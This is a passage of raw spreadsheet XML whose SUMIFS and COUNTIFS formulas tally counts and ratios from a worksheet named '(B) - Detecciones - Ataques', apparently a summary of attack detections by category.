        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>524</v>
      </c>
      <c r="AG70" s="271"/>
      <c r="AH70" s="352" t="s">
        <v>2537</v>
      </c>
      <c r="AI70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>25</v>
      </c>
      <c r="AJ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>16</v>
      </c>
      <c r="AL70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>494</v>
      </c>
      <c r="AR70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>248</v>
      </c>
      <c r="AS70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>4</v>
      </c>
      <c r="AU70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>12</v>
      </c>
      <c r="AV70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>54</v>
      </c>
      <c r="AY70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>8</v>
      </c>
      <c r="BA70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>26</v>
      </c>
      <c r="BB70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>91649</v>
      </c>
      <c r="BD70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>2</v>
      </c>
      <c r="BF70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>9</v>
      </c>
      <c r="BG70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>2</v>
      </c>
      <c r="BJ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>24</v>
      </c>
      <c r="BL70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>2</v>
      </c>
      <c r="BM70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3620535</v>
      </c>
      <c r="BN70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>1083807</v>
      </c>
      <c r="BO70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>205</v>
      </c>
      <c r="BR70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>13</v>
      </c>
      <c r="BT70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>43</v>
      </c>
      <c r="BZ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>266</v>
      </c>
      <c r="CA70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>5</v>
      </c>
      <c r="CG70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>6</v>
      </c>
      <c r="CI70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>34</v>
      </c>
      <c r="CJ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>19</v>
      </c>
      <c r="CL70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>171</v>
      </c>
      <c r="CN70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>17</v>
      </c>
      <c r="CP70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>46</v>
      </c>
      <c r="CQ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>4</v>
      </c>
      <c r="CU70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>18</v>
      </c>
      <c r="CY70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>64</v>
      </c>
      <c r="CZ70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>12</v>
      </c>
      <c r="DF70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>479</v>
      </c>
      <c r="DI70" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ70" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EQ3:$EQ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>19</v>
      </c>
      <c r="DK70" s="271"/>
      <c r="DO70" s="279"/>
      <c r="DP70" s="271"/>
      <c r="DQ70" s="271"/>
      <c r="DR70" s="271"/>
      <c r="DS70" s="271"/>
      <c r="DT70" s="271"/>
      <c r="DU70" s="271"/>
      <c r="DV70" s="271"/>
      <c r="DW70" s="271"/>
      <c r="DX70" s="271"/>
      <c r="DY70" s="271"/>
      <c r="DZ70" s="271"/>
      <c r="EA70" s="271"/>
      <c r="EB70" s="271"/>
      <c r="EC70" s="271"/>
      <c r="ED70" s="280"/>
      <c r="EG70" s="279"/>
      <c r="EH70" s="271"/>
      <c r="EI70" s="271"/>
      <c r="EJ70" s="271"/>
      <c r="EK70" s="271"/>
      <c r="EL70" s="271"/>
      <c r="EM70" s="271"/>
      <c r="EN70" s="271"/>
      <c r="EO70" s="271"/>
      <c r="EP70" s="271"/>
      <c r="EQ70" s="271"/>
      <c r="ER70" s="478"/>
      <c r="ES70" s="271"/>
      <c r="ET70" s="271"/>
      <c r="EU70" s="271"/>
      <c r="EV70" s="271"/>
      <c r="EW70" s="271"/>
      <c r="EX70" s="271"/>
      <c r="EY70" s="271"/>
      <c r="EZ70" s="271"/>
      <c r="FA70" s="280"/>
      <c r="FD70" s="480"/>
      <c r="FE70" s="480"/>
      <c r="FF70" s="480"/>
      <c r="FG70" s="480"/>
      <c r="FH70" s="480"/>
      <c r="FI70" s="480"/>
      <c r="FJ70" s="480"/>
      <c r="FK70" s="480"/>
      <c r="FL70" s="480"/>
      <c r="FM70" s="480"/>
      <c r="FN70" s="480"/>
      <c r="FO70" s="480"/>
      <c r="FP70" s="480"/>
      <c r="FQ70" s="480"/>
      <c r="FR70" s="480"/>
      <c r="FS70" s="480"/>
      <c r="FT70" s="480"/>
      <c r="FU70" s="480"/>
      <c r="FV70" s="480"/>
      <c r="FW70" s="480"/>
      <c r="FX70" s="480"/>
      <c r="FY70" s="379" t="s">
        <v>244</v>
      </c>
      <c r="FZ70" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*"))</f>
        <v>0.5714285714</v>
      </c>
      <c r="GA70" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*"))</f>
        <v>0.5714285714</v>
      </c>
      <c r="GB70" s="480"/>
      <c r="GC70" s="379" t="s">
        <v>244</v>
      </c>
      <c r="GD70" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*"))</f>
        <v>0.5714285714</v>
      </c>
      <c r="GE70" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY53)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY53 &amp; "*"))</f>
        <v>0.5714285714</v>
      </c>
      <c r="GF70" s="480"/>
      <c r="GG70" s="480"/>
      <c r="GH70" s="480"/>
      <c r="GI70" s="480"/>
      <c r="GJ70" s="480"/>
      <c r="GK70" s="480"/>
      <c r="GL70" s="480"/>
      <c r="GM70" s="480"/>
      <c r="GN70" s="480"/>
      <c r="GO70" s="480"/>
      <c r="GP70" s="480"/>
      <c r="GQ70" s="480"/>
      <c r="GR70" s="480"/>
      <c r="GS70" s="480"/>
      <c r="GT70" s="480"/>
      <c r="GU70" s="480"/>
      <c r="GV70" s="480"/>
      <c r="GW70" s="480"/>
      <c r="GX70" s="480"/>
      <c r="GY70" s="480"/>
      <c r="GZ70" s="480"/>
      <c r="HA70" s="480"/>
      <c r="HB70" s="480"/>
      <c r="HC70" s="480"/>
      <c r="HD70" s="480"/>
      <c r="HE70" s="480"/>
      <c r="HF70" s="480"/>
      <c r="HG70" s="480"/>
      <c r="HH70" s="480"/>
      <c r="HI70" s="480"/>
      <c r="HJ70" s="480"/>
      <c r="HK70" s="480"/>
      <c r="HL70" s="480"/>
      <c r="HM70" s="480"/>
      <c r="HN70" s="480"/>
      <c r="HO70" s="480"/>
      <c r="HP70" s="480"/>
    </row>
    <row r="71">
      <c r="J71" s="277"/>
      <c r="K71" s="497" t="s">
        <v>2551</v>
      </c>
      <c r="L71" s="498" t="s">
        <v>2552</v>
      </c>
      <c r="M71" s="498" t="s">
        <v>2553</v>
      </c>
      <c r="N71" s="499" t="s">
        <v>2554</v>
      </c>
      <c r="O71" s="278"/>
      <c r="Q71" s="271"/>
      <c r="R71" s="352" t="s">
        <v>2538</v>
      </c>
      <c r="S71" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$GG3:$GG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>76</v>
      </c>
      <c r="T71" s="353">
